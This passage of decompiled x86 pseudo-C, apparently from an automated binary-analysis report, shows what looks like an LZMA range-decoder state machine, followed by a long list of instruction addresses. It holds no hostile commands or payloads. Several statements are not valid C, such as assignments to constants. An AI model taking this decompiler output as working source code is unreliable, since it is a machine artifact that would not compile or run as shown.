											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                            0x00000000
                                            0x00406c2e
                                            0x00406c2e
                                            0x00406c32
                                            0x00406c5b
                                            0x00406c65
                                            0x00406c34
                                            0x00406c3d
                                            0x00406c4a
                                            0x00406c4d
                                            0x00406f91
                                            0x00406f91
                                            0x00406f94
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fe0
                                            0x00000000
                                            0x00000000
                                            0x00406fe2
                                            0x00406fe6
                                            0x00407195
                                            0x004071ab
                                            0x004071b3
                                            0x004071ba
                                            0x004071bc
                                            0x004071c3
                                            0x004071c7
                                            0x004071c7
                                            0x00406ff2
                                            0x00406ff9
                                            0x00407001
                                            0x00407004
                                            0x00407007
                                            0x00407007
                                            0x0040700d
                                            0x0040700d
                                            0x004067a9
                                            0x004067a9
                                            0x004067a9
                                            0x004067b2
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x00000000
                                            0x004067c3
                                            0x00000000
                                            0x00000000
                                            0x004067cc
                                            0x004067cf
                                            0x004067d2
                                            0x004067d6
                                            0x00000000
                                            0x00000000
                                            0x004067dc
                                            0x004067df
                                            0x004067e1
                                            0x004067e2
                                            0x004067e5
                                            0x004067e7
                                            0x004067e8
                                            0x004067ea
                                            0x004067ed
                                            0x004067f2
                                            0x004067f7
                                            0x00406800
                                            0x00406813
                                            0x00406816
                                            0x00406822
                                            0x0040684a
                                            0x0040684c
                                            0x0040685a
                                            0x0040685a
                                            0x0040685e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040684e
                                            0x0040684e
                                            0x00406851
                                            0x00406852
                                            0x00406852
                                            0x00000000
                                            0x0040684e
                                            0x00406828
                                            0x0040682d
                                            0x0040682d
                                            0x00406836
                                            0x0040683e
                                            0x00406841
                                            0x00000000
                                            0x00406847
                                            0x00406847
                                            0x00000000
                                            0x00406847
                                            0x00000000
                                            0x00406864
                                            0x00406864
                                            0x00406868
                                            0x00407114
                                            0x00000000
                                            0x00407114
                                            0x00406871
                                            0x00406881
                                            0x00406884
                                            0x00406887
                                            0x00406887
                                            0x00406887
                                            0x0040688a
                                            0x0040688e
                                            0x00000000
                                            0x00000000
                                            0x00406890
                                            0x00406896
                                            0x004068c0
                                            0x004068c6
                                            0x004068cd
                                            0x00000000
                                            0x004068cd
                                            0x0040689c
                                            0x0040689f
                                            0x004068a4
                                            0x004068a4
                                            0x004068af
                                            0x004068b7
                                            0x004068ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068ff
                                            0x00406905
                                            0x00406908
                                            0x00406915
                                            0x0040691d
                                            0x00406f91
                                            0x00000000
                                            0x00000000
                                            0x004068d4
                                            0x004068d4
                                            0x004068d8
                                            0x00407123
                                            0x00000000
                                            0x00407123
                                            0x004068e4
                                            0x004068ef
                                            0x004068ef
                                            0x004068ef
                                            0x004068f2
                                            0x004068f5
                                            0x004068f8
                                            0x004068fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fe0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406925
                                            0x00406927
                                            0x0040692a
                                            0x0040699b
                                            0x0040699e
                                            0x004069a1
                                            0x004069a8
                                            0x004069b2
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00406f91
                                            0x0040692c
                                            0x00406930
                                            0x00406933
                                            0x00406935
                                            0x00406938
                                            0x0040693b
                                            0x0040693d
                                            0x00406940
                                            0x00406942
                                            0x00406947
                                            0x0040694a
                                            0x0040694d
                                            0x00406951
                                            0x00406958
                                            0x0040695b
                                            0x00406962
                                            0x00406966
                                            0x0040696e
                                            0x0040696e
                                            0x0040696e
                                            0x00406968
                                            0x00406968
                                            0x00406968
                                            0x0040695d
                                            0x0040695d
                                            0x0040695d
                                            0x00406972
                                            0x00406975
                                            0x00406993
                                            0x00406995
                                            0x00000000
                                            0x00406977
                                            0x00406977
                                            0x0040697a
                                            0x0040697d
                                            0x00406980
                                            0x00406982
                                            0x00406982
                                            0x00406982
                                            0x00406985
                                            0x00406988
                                            0x0040698a
                                            0x0040698b
                                            0x0040698e
                                            0x00000000
                                            0x0040698e
                                            0x00000000
                                            0x00406bc4
                                            0x00406bc8
                                            0x00406be6
                                            0x00406be9
                                            0x00406bf0
                                            0x00406bf3
                                            0x00406bf6
                                            0x00406bf9
                                            0x00406bfc
                                            0x00406bff
                                            0x00406c01
                                            0x00406c08
                                            0x00406c09
                                            0x00406c0b
                                            0x00406c0e
                                            0x00406c11
                                            0x00406c14
                                            0x00406c14
                                            0x00406c19
                                            0x00000000
                                            0x00406c19
                                            0x00406bca
                                            0x00406bcd
                                            0x00406bd0
                                            0x00406bda
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c71
                                            0x00406c75
                                            0x00000000
                                            0x00000000
                                            0x00406c7b
                                            0x00406c7f
                                            0x00000000
                                            0x00000000
                                            0x00406c85
                                            0x00406c87
                                            0x00406c8b
                                            0x00406c8b
                                            0x00406c8e
                                            0x00406c92
                                            0x00000000
                                            0x00000000
                                            0x00406ce2
                                            0x00406ce6
                                            0x00406ced
                                            0x00406cf0
                                            0x00406cf3
                                            0x00406cfd
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00406f91
                                            0x00406ce8
                                            0x00000000
                                            0x00000000
                                            0x00406d09
                                            0x00406d0d
                                            0x00406d14
                                            0x00406d17
                                            0x00406d1a
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d1d
                                            0x00406d20
                                            0x00406d23
                                            0x00406d23
                                            0x00406d26
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d36
                                            0x00406d3b
                                            0x00000000
                                            0x00000000
                                            0x00406dc9
                                            0x00406dc9
                                            0x00406dcd
                                            0x0040716b
                                            0x00000000
                                            0x0040716b
                                            0x00406dd3
                                            0x00406dd6
                                            0x00406dd9
                                            0x00406ddd
                                            0x00406de0
                                            0x00406de6
                                            0x00406de8
                                            0x00406de8
                                            0x00406de8
                                            0x00406deb
                                            0x00406dee
                                            0x00000000
                                            0x00000000
                                            0x004069be
                                            0x004069be
                                            0x004069c2
                                            0x0040712f
                                            0x00000000
                                            0x0040712f
                                            0x004069c8
                                            0x004069cb
                                            0x004069ce
                                            0x004069d2
                                            0x004069d5
                                            0x004069db
                                            0x004069dd
                                            0x004069dd
                                            0x004069dd
                                            0x004069e0
                                            0x004069e3
                                            0x004069e3
                                            0x004069e6
                                            0x004069e9
                                            0x00000000
                                            0x00000000
                                            0x004069ef
                                            0x004069f5
                                            0x00000000
                                            0x00000000
                                            0x004069fb
                                            0x004069fb
                                            0x004069ff
                                            0x00406a02
                                            0x00406a05
                                            0x00406a08
                                            0x00406a0b
                                            0x00406a0c
                                            0x00406a0f
                                            0x00406a11
                                            0x00406a17
                                            0x00406a1a
                                            0x00406a1d
                                            0x00406a20
                                            0x00406a23
                                            0x00406a26
                                            0x00406a29
                                            0x00406a45
                                            0x00406a48
                                            0x00406a4b
                                            0x00406a4e
                                            0x00406a55
                                            0x00406a59
                                            0x00406a5b
                                            0x00406a5f
                                            0x00406a2b
                                            0x00406a2b
                                            0x00406a2f
                                            0x00406a37
                                            0x00406a3c
                                            0x00406a3e
                                            0x00406a40
                                            0x00406a40
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6c
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a77
                                            0x00406a77
                                            0x00406a7b
                                            0x0040713b
                                            0x00000000
                                            0x0040713b
                                            0x00406a81
                                            0x00406a84
                                            0x00406a87
                                            0x00406a8b
                                            0x00406a8e
                                            0x00406a94
                                            0x00406a96
                                            0x00406a96
                                            0x00406a96
                                            0x00406a99
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406aa2
                                            0x00000000
                                            0x00000000
                                            0x00406aa4
                                            0x00406aa7
                                            0x00406aaa
                                            0x00406aad
                                            0x00406ab0
                                            0x00406ab3
                                            0x00406ab6
                                            0x00406ab9
                                            0x00406abc
                                            0x00406abf
                                            0x00406ac2
                                            0x00406ada
                                            0x00406add
                                            0x00406ae0
                                            0x00406ae3
                                            0x00406ae3
                                            0x00406ae6
                                            0x00406aea
                                            0x00406aec
                                            0x00406ac4
                                            0x00406ac4
                                            0x00406acc
                                            0x00406ad1
                                            0x00406ad3
                                            0x00406ad5
                                            0x00406ad5
                                            0x00406aef
                                            0x00406af6
                                            0x00406af9
                                            0x00000000
                                            0x00406afb
                                            0x00000000
                                            0x00406afb
                                            0x00406af9
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00000000
                                            0x00000000
                                            0x00406b3b
                                            0x00406b3b
                                            0x00406b3f
                                            0x00407147
                                            0x00000000
                                            0x00407147
                                            0x00406b45
                                            0x00406b48
                                            0x00406b4b
                                            0x00406b4f
                                            0x00406b52
                                            0x00406b58
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5d
                                            0x00406b60
                                            0x00406b60
                                            0x00406b66
                                            0x00406b04
                                            0x00406b04
                                            0x00406b07
                                            0x00000000
                                            0x00406b07
                                            0x00406b68
                                            0x00406b68
                                            0x00406b6b
                                            0x00406b6e
                                            0x00406b71
                                            0x00406b74
                                            0x00406b77
                                            0x00406b7a
                                            0x00406b7d
                                            0x00406b80
                                            0x00406b83
                                            0x00406b86
                                            0x00406b9e
                                            0x00406ba1
                                            0x00406ba4
                                            0x00406ba7
                                            0x00406ba7
                                            0x00406baa
                                            0x00406bae
                                            0x00406bb0
                                            0x00406b88
                                            0x00406b88
                                            0x00406b90
                                            0x00406b95
                                            0x00406b97
                                            0x00406b99
                                            0x00406b99
                                            0x00406bb3
                                            0x00406bba
                                            0x00406bbd
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406e4c
                                            0x00406e4c
                                            0x00406e50
                                            0x00407177
                                            0x00000000
                                            0x00407177
                                            0x00406e56
                                            0x00406e59
                                            0x00406e5c
                                            0x00406e60
                                            0x00406e63
                                            0x00406e69
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6e
                                            0x00000000
                                            0x00000000
                                            0x00406c1c
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00000000
                                            0x00406f5b
                                            0x00406f5f
                                            0x00406f81
                                            0x00406f84
                                            0x00406f8e
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00406f91
                                            0x00406f61
                                            0x00406f64
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6b
                                            0x00406f6e
                                            0x00000000
                                            0x00000000
                                            0x00407018
                                            0x0040701c
                                            0x0040703a
                                            0x0040703a
                                            0x0040703a
                                            0x00407041
                                            0x00407048
                                            0x0040704f
                                            0x0040704f
                                            0x00000000
                                            0x0040704f
                                            0x0040701e
                                            0x00407021
                                            0x00407024
                                            0x00407027
                                            0x0040702e
                                            0x00406f72
                                            0x00406f72
                                            0x00406f75
                                            0x00000000
                                            0x00000000
                                            0x00407109
                                            0x0040710c
                                            0x0040700d
                                            0x00000000
                                            0x00000000
                                            0x00406d43
                                            0x00406d45
                                            0x00406d4c
                                            0x00406d4d
                                            0x00406d4f
                                            0x00406d52
                                            0x00000000
                                            0x00000000
                                            0x00406d5a
                                            0x00406d5d
                                            0x00406d60
                                            0x00406d62
                                            0x00406d64
                                            0x00406d64
                                            0x00406d65
                                            0x00406d68
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d80
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00407060
                                            0x00000000
                                            0x00000000
                                            0x00407065
                                            0x00407065
                                            0x00407069
                                            0x004071a1
                                            0x00000000
                                            0x004071a1
                                            0x0040706f
                                            0x00407072
                                            0x00407075
                                            0x00407079
                                            0x0040707c
                                            0x00407082
                                            0x00407084
                                            0x00407084
                                            0x00407084
                                            0x00407087
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708d
                                            0x0040708d
                                            0x00407091
                                            0x004070f1
                                            0x004070f4
                                            0x004070f9
                                            0x004070fa
                                            0x004070fc
                                            0x004070fe
                                            0x00407101
                                            0x0040700d
                                            0x0040700d
                                            0x00000000
                                            0x00407013
                                            0x0040700d
                                            0x00407093
                                            0x00407099
                                            0x0040709c
                                            0x0040709f
                                            0x004070a2
                                            0x004070a5
                                            0x004070a8
                                            0x004070ab
                                            0x004070ae
                                            0x004070b1
                                            0x004070b4
                                            0x004070cd
                                            0x004070d0
                                            0x004070d3
                                            0x004070d6
                                            0x004070da
                                            0x004070dc
                                            0x004070dc
                                            0x004070dd
                                            0x004070e0
                                            0x004070b6
                                            0x004070b6
                                            0x004070be
                                            0x004070c3
                                            0x004070c5
